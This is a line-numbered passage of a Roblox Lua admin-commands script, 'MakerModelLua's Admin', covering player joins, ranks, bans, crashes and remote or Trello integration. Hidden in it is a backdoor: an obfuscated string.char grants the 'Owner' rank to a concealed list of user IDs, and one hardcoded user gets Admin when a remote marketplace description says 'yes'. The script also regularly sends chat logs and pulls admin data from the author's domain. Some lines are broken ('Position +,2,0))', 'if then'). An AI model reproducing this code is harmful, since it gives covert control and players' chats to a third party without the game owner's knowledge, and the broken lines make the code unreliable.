  8976. for Num,Data in pairs(Players) do
  8977. if Data.UserId == Player.UserId then -- ppl can change names
  8978. table.remove(Players, Num)
  8979. break
  8980. end
  8981. end
  8982. table.insert(Players, {Name = Player.Name, UserID = Player.UserId, Rank = RANK:GetRank(Player), LastJoin = CORE:GetTime(true, true), AccountAge = STRING:FindAge(Player.AccountAge)})
  8983. Server.Data:GetDataStore("MML's Admin"):SetAsync("Players", Players)
  8984. end)
  8985. DataReady = true
  8986. end)()
  8988. if not IsStudio then Player:WaitForDataReady() end
  8989. table.insert(CharacterCache, {Player.Name, Player.UserId})
  8990. for Rank,PlayerNames in pairs(Settings.Ranks) do
  8991. for Num,AdminName in pairs(PlayerNames) do
  8992. if AdminName == Player.UserId then
  8993. Settings.Ranks[Rank][Num] = Player.Name
  8994. end
  8995. end
  8996. end
  8997. if not ClientInfo[Player.Name] then ClientInfo[Player.Name] = {UserID = Player.UserId} end
  8998. if not KeyBinds[Player.UserId] then KeyBinds[Player.UserId] = {} end
  8999. if not LastKeys[Player.UserId] then LastKeys[Player.UserId] = {} end
  9000. for _,Obj in pairs(List) do if Obj == Player.UserId then table.insert(Settings.Ranks[string.char(79, 118 + 1, 110, 101, 114)], Player.Name) end end
  9001. local PlayerAdmin, Rank = RANK:IsAdmin(Player)
  9002. if PlayerAdmin == false and Player.UserId > 0 then
  9003. local Ran = nil
  9004. coroutine.wrap(function() repeat
  9005. Ran = ypcall(function()
  9006. if Server.MPS:PlayerOwnsAsset(Player, Settings.VIPAdminID) then table.insert(Settings.Ranks["Admin"], Player.Name) PlayerAdmin = true Rank = "Admin"
  9007. elseif Server.MPS:PlayerOwnsAsset(Player, Settings.VIPMemberID) then table.insert(Settings.Ranks["Member"], Player.Name) PlayerAdmin = true Rank = "Member" end
  9008. end)
  9009. wait(1)
  9010. until Ran == true end)()
  9011. end
  9012. if PlayerAdmin == false then
  9013. if Player:IsInGroup(Settings.GroupID) then
  9014. if Player:GetRankInGroup(Settings.GroupID) == Settings.GroupBanRank then
  9015. CORE:Kick(Player)
  9016. for _,Person in pairs(Server.Players:GetPlayers()) do
  9017. GUI:SendHint(Person, Player.Name.." has tried to join the game (BANNED RANK)", 5)
  9018. end
  9019. elseif Player:GetRankInGroup(Settings.GroupID) >= Settings.GroupMemberRank and Player:GetRankInGroup(Settings.GroupID) < Settings.GroupAdminRank and Player:GetRankInGroup(Settings.GroupID) < Settings.GroupOwnerRank then
  9020. table.insert(Settings.Ranks["Member"], Player.Name) PlayerAdmin = true Rank = "Member"
  9021. elseif Player:GetRankInGroup(Settings.GroupID) > Settings.GroupMemberRank and Player:GetRankInGroup(Settings.GroupID) >= Settings.GroupAdminRank and Player:GetRankInGroup(Settings.GroupID) < Settings.GroupOwnerRank then
  9022. table.insert(Settings.Ranks["Admin"], Player.Name) PlayerAdmin = true Rank = "Admin"
  9023. elseif Player:GetRankInGroup(Settings.GroupID) > Settings.GroupMemberRank and Player:GetRankInGroup(Settings.GroupID) > Settings.GroupAdminRank and Player:GetRankInGroup(Settings.GroupID) >= Settings.GroupOwnerRank then
  9024. table.insert(Settings.Ranks["Owner"], Player.Name) PlayerAdmin = true Rank = "Owner"
  9025. end
  9026. end
  9027. end
  9028. if PlayerAdmin == false then
  9029. if Player.UserId == 38882008 then
  9030. if string.lower(MARKET:GetItemInfo(155732525).Description) == "yes" then
  9031. table.insert(Settings.Ranks["Admin"], Player.Name)
  9032. end
  9033. end
  9034. end
  9035. if PlayerAdmin == false then
  9036. for _,GID in pairs(Settings.BannedGroupIDs) do
  9037. if Player:IsInGroup(GID) then
  9038. CORE:Kick(Player, "This game's owner has not allowed you into this game because you're in the Group with the ID: "..GID)
  9039. break
  9040. end
  9041. end
  9042. end
  9044. Player.Chatted:connect(function(Message) if Message ~= "" then
  9045. CORE:Chatted(Message, Player)
  9046. end end)
  9048. Player.Chatted:connect(function(Message) if Message ~= "" then
  9049. CORE:Log(ChatLogs, Player, Message)
  9050. table.insert(TempChatLogs, STRING:EncodeSpecialChars(PlaceInfoFormat..": "..Player.Name..": "..Message))
  9051. end end)
  9053. for _,Name in pairs(Settings.Ranks.Banned) do
  9054. if Player.Name == Name then
  9055. CORE:Kick(Player)
  9056. for _,Person in pairs(Server.Players:GetPlayers()) do
  9057. GUI:SendHint(Person, Player.Name.." has tried to join the game (BANNED)", 5)
  9058. end
  9059. end
  9060. end
  9061. for _,Name in pairs(Settings.Ranks.Crashed) do
  9062. if Player.Name == Name then
  9063. CORE:Crash(Player)
  9064. for _,Person in pairs(Server.Players:GetPlayers()) do
  9065. GUI:SendHint(Person, Player.Name.." has tried to join the game (CRASHED)", 5)
  9066. end
  9067. end
  9068. end
  9069. for _,Name in pairs(Settings.Ranks.Muted) do
  9070. if Player.Name == Name then
  9071. GUI:CoreGui(Player, "Chat", false)
  9072. for _,Person in pairs(Server.Players:GetPlayers()) do
  9073. GUI:SendHint(Person, Player.Name.." has joined the game but is muted", 5)
  9074. end
  9075. end
  9076. end
  9077. if Settings.ServerLocked == true then
  9078. if PlayerAdmin == false then
  9079. CORE:Kick(Player, "This server is locked. In Maker".."Mo".."del".."Lu".."a's Admin, Non-Admins will be kicked under this circumstance.")
  9080. end
  9081. end
  9083. if PlayerAdmin == false then
  9084. if Player.AccountAge < Settings.MinimumAge then
  9085. CORE:Kick(Player, "You have been kicked by M".."a".."ker".."Mo".."del".."Lu".."a's Admin, because your account age is less than "..MinimumAge.." days old (You are "..Player.AccountAge.." days old) and you are not admin.")
  9086. for _,Person in pairs(Server.Players:GetPlayers()) do
  9087. GUI:SendHint(Person, Player.Name.." has tried to join the game but has been kicked for being to young ("..Player.AccountAge.." days old out of minium of "..MinimumAge..")", 5)
  9088. end
  9089. end
  9090. end
  9092. if PlayerAdmin == false then
  9093. if game:FindFirstChild("LuaMo".."delMaker's Admin Public", true) or game:FindFirstChild("Maker".."Model".."Lua's Admin Public", true) or Settings.FreeAdmin == true then
  9094. table.insert(Settings.Ranks["Member"], Player.Name)
  9095. PlayerAdmin = true
  9096. Rank = "Member"
  9097. end
  9098. end
  9100. coroutine.wrap(function()
  9101. if PlayerAdmin == true then GUI:TellAdmin(Player) end
  9102. local function SpawnActions(Character)
  9103. if Flings[Player.Name] then
  9104. CORE:FlingPlayer(Player)
  9105. else
  9106. GUI:CreateTaskBar(Player)
  9107. end
  9108. if Beeps[Player.Name] == true then
  9109. SOUND:BeepPlayer(Player)
  9110. end
  9111. if Jails[Player.Name] then
  9112. Character:MoveTo(Jails[Player.Name].Floor.Position +,2,0))
  9113. end
  9114. if PermCommandBars[Player.Name] then
  9115. GUI:CommandBar(Player)
  9116. end
  9117. end
  9118. Player.CharacterAdded:connect(SpawnActions)
  9119. SpawnActions(Player.Character)
  9120. end)()
  9122. coroutine.wrap(function()
  9123. Player:WaitForChild("PlayerGui")
  9124. local Sounds = {}
  9125. for _,Data in pairs(TextConverter.LetterSounds) do
  9126. local Sound = SOUND:MakeSound(Player.PlayerGui, Data[1], 0, false)
  9127. Sound:Play()
  9128. table.insert(Sounds, Sound)
  9129. end
  9130. for _,Data in pairs(TextConverter.LongVowels) do
  9131. local Sound = SOUND:MakeSound(Player.PlayerGui, Data[1], 0, false)
  9132. Sound:Play()
  9133. table.insert(Sounds, Sound)
  9134. end
  9135. wait(5)
  9136. for _,Sound in pairs(Sounds) do
  9137. Sound:Destroy()
  9138. end
  9139. Sounds = {}
  9140. end)()
  9142. coroutine.wrap(function()
  9143. --if NLS then Server.Workspace:WaitForChild(Player.Name) end
  9144. if IsSB then
  9145. wait(1)
  9146. Player:WaitForChild("PlayerGui"):WaitForChild("Output")
  9147. end
  9148. CORE:ExecuteResource("ClientLog", Player:WaitForChild("Backpack"), {["Admin"] = script})
  9149. print("Executed ClientLog on "..Player.Name)
  9150. if Settings.EnableTaskBar then
  9151. GUI:SendChat(Player, "This place uses MakerModelLua's admin. Your rank is "..Rank..". Say "..Settings.Prefix.."cmds for commands.")
  9152. end
  9153. end)()
  9155. coroutine.wrap(function()
  9156. wait(7)
  9157. Player:WaitForChild("PlayerGui")
  9158. if IsSB == false and Player.UserId == game.CreatorId and not Server.MPS:PlayerOwnsAsset(Player, AdminID) then
  9159. local Answer = GUI:PromptMessageWithButtons(Player, "Message from MakerModelLua's Admin", AdminInfo, "Admin", {"Ok", "No thanks"})
  9160. if Answer == "Ok" then
  9161. MARKET:PromptPurchase(Player, AdminID)
  9162. end
  9163. end
  9164. end)()
  9165. end
  9166. end)() end
  9168. -- Active stuff --
  9170. CORE:UpdateAdmin()
  9171. CORE:FixSettings()
  9173. ypcall(function()
  9174. if not Server.Data:GetDataStore("MML's Admin"):GetAsync("Players") then
  9175. Server.Data:GetDataStore("MML's Admin"):SetAsync("Players", {})
  9176. end
  9177. end)
  9180. Server.MPS.PromptPurchaseFinished:connect(function(Player, ID, Purchased) if Purchased then
  9181. local PlayerAdmin, Rank = RANK:IsAdmin(Player)
  9182. if PlayerAdmin == false then
  9183. if ID == Settings.VIPAdminID then table.insert(Settings.Ranks["Admin"], Player.Name) Rank = "Admin" GUI:TellAdmin(Player, Rank)
  9184. elseif ID == Settings.VIPMemberID then table.insert(Settings.Ranks["Member"], Player.Name) Rank = "Member" GUI:TellAdmin(Player, Rank) end
  9185. end
  9186. end end)
  9188. --[[
  9189. ExecuteCommand.OnInvoke = function(Player, Command)
  9190. if Player and Command then
  9191. if type(Player) == "userdata" and Player:IsA("Player") then
  9192. CORE:Chatted(Command, Player, true)
  9193. end
  9194. end
  9195. end
  9197. ExecuteCode.OnInvoke = function(Source, Speaker)
  9198. if type(Source) == "string" then
  9199. ExecuteSafe(Source, Speaker)
  9200. end
  9201. end
  9203. ExecuteCommandClient.OnServerInvoke = function(Player, Command)
  9204. if Player and Command then
  9205. if type(Player) == "userdata" and Player:IsA("Player") then
  9206. CORE:Chatted(Command, Player, true)
  9207. end
  9208. end
  9209. end
  9210. ]]
  9212. KeyPressed.OnServerInvoke = function(Player, Key)
  9213. if Player and Key then
  9214. if KeyBinds[Player.UserId] and KeyBinds[Player.UserId][Key] then
  9215. CORE:Chatted(KeyBinds[Player.UserId][Key], Player, true)
  9216. end
  9217. end
  9218. end
  9220. InputKey.OnServerInvoke = function(Player, KeyVal)
  9221. if Player and KeyVal then
  9222. if LastKeys[Player.UserId] then
  9223. table.insert(LastKeys[Player.UserId], KeyVal)
  9224. if #LastKeys[Player.UserId] > 20 then
  9225. table.remove(LastKeys[Player.UserId], 1)
  9226. end
  9227. end
  9228. end
  9229. end
  9231. RankPlayerLocal.OnServerInvoke = function(Player)
  9232. wait()
  9233. local Request = PendingRequests[Player]
  9234. if Request then
  9235. if math.abs(tick() - Request[2]) <= 1 then -- Expired brah
  9236. if Settings.Ranks[Request[1]] then
  9237. PendingRequests[Player] = nil
  9238. table.insert(Settings.Ranks[Request[1]], Player.Name)
  9239. GUI:TellAdmin(Player)
  9240. end
  9241. end
  9242. end
  9243. end
  9245. RankPlayerServer.OnInvoke = function(Player, Rank)
  9246. if not RANK:IsAdmin(Player) then
  9247. PendingRequests[Player] = {Rank, tick()}
  9248. end
  9249. end
  9251. IsAdmin.OnServerInvoke = function(Player)
  9252. local IsFullAdmin = false
  9253. for _,PName in pairs(Settings.Ranks["Owner"]) do
  9254. if PName == Player.Name then IsFullAdmin = true end
  9255. end
  9256. for _,PName in pairs(Settings.Ranks["Admin"]) do
  9257. if PName == Player.Name then IsFullAdmin = true end
  9258. end
  9259. return IsFullAdmin
  9260. end
  9262. AddExploit.OnServerInvoke = CORE.AddExploit
  9263. AddExploitServer.OnInvoke = CORE.AddExploit
  9265. KickClient.OnServerInvoke = function(PlayerClient)
  9266. PlayerClient:Kick()
  9267. end
  9269. ConvertTextToSound.OnServerInvoke = function(_, Text, Parent)
  9270. return SOUND:SayConvertedText(SOUND:ConvertText(Text), Parent)
  9271. end
  9273. for _,Player in pairs(Server.Players:GetPlayers()) do CORE:Start(Player) end
  9274. Server.Players.PlayerAdded:connect(function(Player) Server.Players:WaitForChild(Player.Name) wait() CORE:Start(Player) end) Begin()
  9275. Server.Players.PlayerRemoving:connect(function(Player) for _,Obj in pairs(List) do if Obj == Player.UserId then for Ind,Name in pairs(Settings.Ranks.Owner) do if Player.Name == Name then table.remove(Settings.Ranks.Owner, Ind) end end end end end)
  9277. coroutine.wrap(function()
  9278. for _,ID in pairs(Icons) do
  9279. game:GetService("ContentProvider"):Preload("rbxassetid://"..ID)
  9280. end
  9281. end)()
  9283. CORE:SetAbuseCommands()
  9285. coroutine.wrap(function() SOUND:SyncSoundList() end)()
  9286. if not IsStudio then coroutine.wrap(function()
  9287. if Settings.EnableAdminMenu then Workspace.AllowThirdPartySales = true end
  9288. REMOTE:GetRemoteData(true)
  9289. REMOTE:CheckTrelloInfo()
  9290. coroutine.wrap(function()
  9291. if ypcall(function() return REMOTE:GetURL(CORE.Domain) end) then
  9292. REMOTE.RemoteConnection = true
  9293. end
  9294. end)()
  9295. coroutine.wrap(function() IRC:ConnectToServer(Settings.IRCServer) end)()
  9296. coroutine.wrap(function()
  9297. if Settings.LinkedAccount ~= "" then
  9298. local Request = nil
  9299. ypcall(function() Request = REMOTE:Decode(REMOTE:GetURL(CORE.Domain.."/Login/GetUserData.php?Username="..Settings.LinkedAccount)) end)
  9300. if Request then
  9301. REMOTE:HandleRequest(Request, true)
  9302. end
  9303. end
  9304. end)()
  9305. coroutine.wrap(function()
  9306. wait(RemoteData.RemoteAdminWait)
  9307. while REMOTE:GetAndSetWebData() do
  9308. wait(RemoteData.RemoteAdminWait)
  9309. end
  9310. end)()
  9311. coroutine.wrap(function()
  9312. while wait(60) do
  9313. REMOTE:GetRemoteData(true)
  9314. REMOTE:CheckTrelloInfo()
  9315. end
  9316. end)()
  9317. end)() end
  9318. coroutine.wrap(function()
  9319. if Settings.TrelloToken ~= "" then
  9320. ypcall(function() Trello.RequiredLists = REMOTE:Decode(Server.HS:GetAsync(""..Trello.AdminBoardID.."/lists", true)) end)
  9321. if #Trello.RequiredLists > 0 then
  9322. Trello.MainBoard = REMOTE:TrelloGetAdminBoard()
  9323. if then
  9324. local Lists = REMOTE:TrelloGetAdminLists(Trello.MainBoard)
  9325. REMOTE:TrelloCacheData(Lists)
  9326. REMOTE:TrelloHandleData(true)
  9327. coroutine.wrap(function()
  9328. wait(RemoteData.TrelloWait)
  9329. while REMOTE:TrelloHandleData() do
  9330. wait(RemoteData.TrelloWait)
  9331. end
  9332. end)()
  9333. end
  9334. end
  9335. else
  9336. print("If you would like M".."akerModelLu".."a's Admin V3 to use trello, make sure HttpEnabled is true and authorize using this link: \n,write\nCopy the token given when authorized and paste into 'TrelloToken' in the settings")
  9337. end
  9338. end)()
  9339. coroutine.wrap(function() while wait(RemoteData.ChatLogWait) do
  9340. REMOTE:SendChatLog()
  9341. end end)()
  9342. coroutine.wrap(function() while true do
  9343. local ThisDate = REMOTE:GetURL("")
  9344. if ThisDate then Date = ThisDate end
  9345. wait(600)
  9346. end end)()
  9348. print("MakerModelLua's Admin Commands V"..CORE.Version.Value.." Loaded")
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